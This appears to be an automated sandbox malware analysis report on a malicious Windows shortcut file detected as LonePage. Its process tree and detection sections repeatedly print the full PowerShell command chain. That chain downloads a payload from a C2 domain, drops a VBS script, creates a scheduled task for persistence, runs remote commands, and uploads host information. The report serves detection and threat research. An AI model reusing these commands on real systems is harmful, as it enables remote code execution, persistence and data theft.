Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XnQmVRj5g0.lnk

Overview

General Information

Sample name:XnQmVRj5g0.lnk
renamed because original name is a hash value
Original sample name:b415741b40f9031d1810d06f0bcbcaa0d611c07ccbc3b04828ac779ee9e05a2a.lnk
Analysis ID:1522698
MD5:2fcd108de2e6877f79c4a05cb09488db
SHA1:bf42aa0d6a60edee62736782933fb9212138e605
SHA256:b415741b40f9031d1810d06f0bcbcaa0d611c07ccbc3b04828ac779ee9e05a2a
Tags:lnkUAC-0099user-JAMESWT_MHT
Infos:

Detection

LonePage
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download payload from hardcoded c2 list
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LonePage
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 5904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Acrobat.exe (PID: 7188 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7468 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7720 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2096 --field-trial-handle=1588,i,905989185321007172,14586961761040631262,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • schtasks.exe (PID: 7340 cmdline: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 7416 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7548 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 4864 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 6804 cmdline: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);} MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\Public\Libraries\Libraries.vbsJoeSecurity_LonePageYara detected LonePageJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.1408855210.000001DD69175000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
      0000001A.00000002.1916774143.0000012F1C33F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
        0000001F.00000002.3716225104.0000019D57E46000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
          0000001A.00000002.1916774143.0000012F1C381000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
            0000001F.00000002.3716225104.0000019D57E98000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_LonePageYara detected LonePageJoe Security
              Click to see the 37 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_5904.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x10c:$b1: ::WriteAllBytes(
              • 0xe5:$b2: ::FromBase64String(
              • 0x643:$b2: ::FromBase64String(
              • 0xbf6f:$s1: -join
              • 0x571b:$s4: +=
              • 0x57dd:$s4: +=
              • 0x9a04:$s4: +=
              • 0xbb21:$s4: +=
              • 0xbe0b:$s4: +=
              • 0xbf51:$s4: +=
              • 0xd6ea:$s4: +=
              • 0xd76a:$s4: +=
              • 0xd830:$s4: +=
              • 0xd8b0:$s4: +=
              • 0xda86:$s4: +=
              • 0xdb0a:$s4: +=
              • 0xe288:$e4: Get-WmiObject
              • 0xe477:$e4: Get-Process
              • 0xe4cf:$e4: Start-Process

              Sigma Signatures

              Spreading

              barindex
              Sigma detected: Powershell download payload from hardcoded c2 list
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}, CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7416, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]

              System Summary

              barindex
              Sigma detected: Base64 Encoded PowerShell Command Detected
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Potentially Suspicious PowerShell Child Processes
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5904, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f, ProcessId: 7340, ProcessName: schtasks.exe
              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', 